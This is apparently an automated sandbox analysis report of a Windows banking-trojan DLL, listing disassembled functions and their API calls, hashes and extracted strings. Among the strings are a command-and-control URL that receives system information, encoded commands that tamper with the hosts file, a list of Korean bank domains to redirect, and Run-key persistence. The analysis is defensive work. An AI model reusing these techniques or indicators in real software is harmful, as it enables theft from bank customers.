                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk$Sleepwsprintf
                                                                                                                                      • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 2795264321-3398374254
                                                                                                                                      • Opcode ID: aa513003387c355abc963e83af9959fb4ce06968deafc37a589a73ab8a51a600
                                                                                                                                      • Instruction ID: 599745a503878d8c2b4f4c943fee7f854f2ac9340d99916b44456f1581be1535
                                                                                                                                      • Opcode Fuzzy Hash: aa513003387c355abc963e83af9959fb4ce06968deafc37a589a73ab8a51a600
                                                                                                                                      • Instruction Fuzzy Hash: E141F6B6904358B6FB21D364CC46FCF77ACEB457C0F2400A5F248A9086DAB4AB844E51
                                                                                                                                      Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 103filethreadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 1000574F
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,10016AD0), ref: 1000537D
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?, ,?,10016AD0), ref: 1000538A
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,00000000,?, ,?,10016AD0), ref: 10005393
                                                                                                                                        • Part of subcall function 10005318: LdrInitializeThunk.NTDLL(?,1001538C,?,00000000,?, ,?,10016AD0), ref: 100053A0
                                                                                                                                      • wsprintfA.USER32 ref: 100057B1
                                                                                                                                      • wsprintfA.USER32 ref: 100057C5
                                                                                                                                      • PrintFile.4HSURTWNWJ(?,?,?,?,00000000), ref: 100057E8
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005620,00000000,00000000,00000000), ref: 10005835
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk$wsprintf$CreateFilePrintThread
                                                                                                                                      • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                                                                                                      • API String ID: 2056782399-1421401311
                                                                                                                                      • Opcode ID: 999454b76a3871e070a6a5ffc189addd559c3746fb8db70fc033f3fdbaaeec8c
                                                                                                                                      • Instruction ID: 3475601ff51186fd0577e9aefcd7f13683c9e8deab9ec6392723b4efb7ee459d
                                                                                                                                      • Opcode Fuzzy Hash: 999454b76a3871e070a6a5ffc189addd559c3746fb8db70fc033f3fdbaaeec8c
                                                                                                                                      • Instruction Fuzzy Hash: E531A772910238BBEB21D7A4CC45FCF7B6CEB08356F0404A6F708FA051DB71AAC58A95
                                                                                                                                      Function 10006499 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 271timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • wsprintfA.USER32 ref: 100064F7
                                                                                                                                        • Part of subcall function 10003F0A: InternetOpenA.WININET(?,?,?,?,?), ref: 10003F1C
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                        • Part of subcall function 10003F24: InternetOpenUrlA.WININET(?,?,?,?,?,?), ref: 10003F39
                                                                                                                                        • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF), ref: 100065C8
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00000000,?,?,?,?,000000FF), ref: 100065E6
                                                                                                                                      • wsprintfA.USER32 ref: 100066E9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                      • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                      • API String ID: 4077377486-2496724313
                                                                                                                                      • Opcode ID: 83aa3aa6bf516d6c3505b0f026932e1ea81e6e4526a9e20d3e14812d000b8952
                                                                                                                                      • Instruction ID: 044586ec3c66e1b491d8aef48fe61f5f32d537583c3337ebc29691013f4a6a04
                                                                                                                                      • Opcode Fuzzy Hash: 83aa3aa6bf516d6c3505b0f026932e1ea81e6e4526a9e20d3e14812d000b8952
                                                                                                                                      • Instruction Fuzzy Hash: 8A81D4B980124CBEFB01DBA4DC81EFF7B7EEF09394F244069F504A6186DA356E4187A1
                                                                                                                                      Function 1000600F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 97libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,10015560), ref: 100060BB
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,?,?,10015560), ref: 100060CE
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,10015560,?,?,?,10015560), ref: 100060DB
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                                                                                                                      • API String ID: 2994545307-1569318151
                                                                                                                                      • Opcode ID: 5adf153cc9580fb278344c39589a6ba9b71a499fa2f994386b1a3d3fccec60b6
                                                                                                                                      • Instruction ID: 89362ecd2e020830cb73e300e147660b047a90e03c50ce999b2b664bc423d859
                                                                                                                                      • Opcode Fuzzy Hash: 5adf153cc9580fb278344c39589a6ba9b71a499fa2f994386b1a3d3fccec60b6
                                                                                                                                      • Instruction Fuzzy Hash: BA317FB6D0065CBAEB11DBA4CC45FDF7F7DEB08341F4404A6F208AA181E731AA458E60
                                                                                                                                      Function 10005DB4 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 109timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
                                                                                                                                        • Part of subcall function 1000409D: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040B2
                                                                                                                                        • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E1E,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                      • String ID: %u MB$11301248$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.56.236:18963/main.php
                                                                                                                                      • API String ID: 271660946-3098610844
                                                                                                                                      • Opcode ID: 89ef436d12fc4dc7334d8d0032665fcea276c3ced92210afa0b41b76ea0b6097
                                                                                                                                      • Instruction ID: abc6f20b1ce2cb917ff0de70ec6e798626a5ef384760a4d5e12c6da5aced1c49
                                                                                                                                      • Opcode Fuzzy Hash: 89ef436d12fc4dc7334d8d0032665fcea276c3ced92210afa0b41b76ea0b6097
                                                                                                                                      • Instruction Fuzzy Hash: 7431B27680421CBAFB21C764DC42FDF77BCEB08350F14406AF658BA182DB75BA458B55
                                                                                                                                      Function 1000436F Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 72sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$wsprintf
                                                                                                                                      • String ID: %s.%d$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$self
                                                                                                                                      • API String ID: 3195947292-4033731652
                                                                                                                                      • Opcode ID: 9b701531f22789b5dad6288f69fc764c12d1df05a5603929814c97d9c4d790f8
                                                                                                                                      • Instruction ID: 4c3d49f5aa9e73cfdb38f6eb8da828af3488b33cf980db7ddda8d91dcb2ab0ee
                                                                                                                                      • Opcode Fuzzy Hash: 9b701531f22789b5dad6288f69fc764c12d1df05a5603929814c97d9c4d790f8
                                                                                                                                      • Instruction Fuzzy Hash: FB1104B6410254BAFB11FB24DC82BDE3759EF043D6F114015F6486D095CFB6EA808A28
                                                                                                                                      Function 10006CF7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                        • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 1000408A
                                                                                                                                      • wsprintfA.USER32 ref: 10006D88
                                                                                                                                      • ___crtGetTimeFormatEx.LIBCMT ref: 10006DAE
                                                                                                                                        • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040E9
                                                                                                                                        • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E1E,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
                                                                                                                                      Strings
                                                                                                                                      • %s "%s",WriteErrorLog, xrefs: 10006D82
                                                                                                                                      • wfl, xrefs: 10006DA6
                                                                                                                                      • U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D4A
                                                                                                                                      • REG_SZ, xrefs: 10006D44
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                      • String ID: %s "%s",WriteErrorLog$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$wfl
                                                                                                                                      • API String ID: 1762869224-1975788281
                                                                                                                                      • Opcode ID: 09b82ed3fa21d08270873fcba192dd1c088d294b030418533f6bf83d9de58f3b
                                                                                                                                      • Instruction ID: 3647a5429755ecec446a2f8ccc26c264e58e26412829948a16bcfe0502dd19e7
                                                                                                                                      • Opcode Fuzzy Hash: 09b82ed3fa21d08270873fcba192dd1c088d294b030418533f6bf83d9de58f3b
                                                                                                                                      • Instruction Fuzzy Hash: E21182B694421CBEFB11D7A4DC86FEB776CEB14354F1004A1F704B9086DAB16FD88AA4
                                                                                                                                      Function 10005318 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,10016AD0), ref: 1000537D
                                                                                                                                      • LdrInitializeThunk.NTDLL(?, ,?,10016AD0), ref: 1000538A
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,00000000,?, ,?,10016AD0), ref: 10005393
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,1001538C,?,00000000,?, ,?,10016AD0), ref: 100053A0
                                                                                                                                      Strings
                                                                                                                                      • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000533C
                                                                                                                                      • , xrefs: 10005382
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                                                                                                                      • API String ID: 2994545307-230412946
                                                                                                                                      • Opcode ID: 3b020e24c8a578c632c56907784a19a060a6d32522b8a51a2964e7663defaab2
                                                                                                                                      • Instruction ID: 7b9eba5214e38b9c0046b44e98cd3c08d7103b83dd10e5a9e8c46b29d818ea5a
                                                                                                                                      • Opcode Fuzzy Hash: 3b020e24c8a578c632c56907784a19a060a6d32522b8a51a2964e7663defaab2
                                                                                                                                      • Instruction Fuzzy Hash: 6C01B53690431D7AFB12EB64CC41FCE7B59EF482C2F040479FA487A096DBB5BAC54A90
                                                                                                                                      Function 10004630 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 103libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(?,\*.*,?,?), ref: 1000466E
                                                                                                                                      • wsprintfA.USER32 ref: 100046C3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunkwsprintf
                                                                                                                                      • String ID: %s\%s$.$\*.*
                                                                                                                                      • API String ID: 2324811901-2210278135
                                                                                                                                      • Opcode ID: c8dc6191325d0a066ef2ee04b5eafb8e92097f0a8145ee8dbbcb18372a2fd474
                                                                                                                                      • Instruction ID: f5f062f8905d167b997c6355d0c7bab38e41e78a09b79b991177f9edbeb39cb3
                                                                                                                                      • Opcode Fuzzy Hash: c8dc6191325d0a066ef2ee04b5eafb8e92097f0a8145ee8dbbcb18372a2fd474
                                                                                                                                      • Instruction Fuzzy Hash: 95319DB6C0025CBBEF12DFA4CC46EDE7B78EF05390F0405A6F618A6055DB30AB989B50
                                                                                                                                      Function 10006A6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64sleepthreadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                      • GetLastError.KERNEL32 ref: 10006AA8
                                                                                                                                        • Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
                                                                                                                                        • Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                      • Sleep.KERNEL32(0002BF20), ref: 10006ADD
                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000687E,00000000,00000000,00000000), ref: 10006AF1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                      • String ID: 0x5d65r455f$5762479093
                                                                                                                                      • API String ID: 3244495550-2446933972
                                                                                                                                      • Opcode ID: c03ba4a081020bfdd3309630d10a7bcdbe0af8bd8e535028a7987193fc45222b
                                                                                                                                      • Instruction ID: 325b642b3227e7783157f4dbf46b27218333242e6ebaac23ecbdbf3e0d4f9812
                                                                                                                                      • Opcode Fuzzy Hash: c03ba4a081020bfdd3309630d10a7bcdbe0af8bd8e535028a7987193fc45222b
                                                                                                                                      • Instruction Fuzzy Hash: 0A0145769442187EF211E3B09CC6CBF3A4DCB963E0F240039FA049A08BDA25AC1541B2
                                                                                                                                      Function 1000C39A Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 467COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: /$UT
                                                                                                                                      • API String ID: 0-1626504983
                                                                                                                                      • Opcode ID: d1385d4c8eda0160eaf8ffe58f1b5828de801106f817f5cd3ba59b5b2734f163
                                                                                                                                      • Instruction ID: 9749cb303701225e843429815a229fc3c71e96fc98374eea56fab15d36df2ae9
                                                                                                                                      • Opcode Fuzzy Hash: d1385d4c8eda0160eaf8ffe58f1b5828de801106f817f5cd3ba59b5b2734f163
                                                                                                                                      • Instruction Fuzzy Hash: D702D375A0438D9BEB21CF68C845F9EB7F9EF04380F1044AEE449A7246DB70AA85CB15
                                                                                                                                      Function 10005CF7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71timeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005C92,?,?,%s\lang.ini,100167C0), ref: 10003F76
                                                                                                                                      • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                      • Associated: 00000007.00000002.1845748027.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845783694.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845800666.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845820339.000000001001C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845850063.000000001003B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000007.00000002.1845873363.000000001004B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                      • String ID: %s\lang.ini$http://$search
                                                                                                                                      • API String ID: 1721638100-482061809
                                                                                                                                      • Opcode ID: e4bfb2394a1271f0cc96f64fc01ec0e3f910cc59e84c299b65da0151ae5ece77
                                                                                                                                      • Instruction ID: b3bc656a91bf72a69bb9aa1d368438114750f6a640d27bcd72447e1c911250d4
                                                                                                                                      • Opcode Fuzzy Hash: e4bfb2394a1271f0cc96f64fc01ec0e3f910cc59e84c299b65da0151ae5ece77
                                                                                                                                      • Instruction Fuzzy Hash: CE1129769081197FFB61DAA4CC42FDB376CDB103D5F104572FB58A90C1EA71ABC44A60
                                                                                                                                      Function 10008086 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117sleepCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
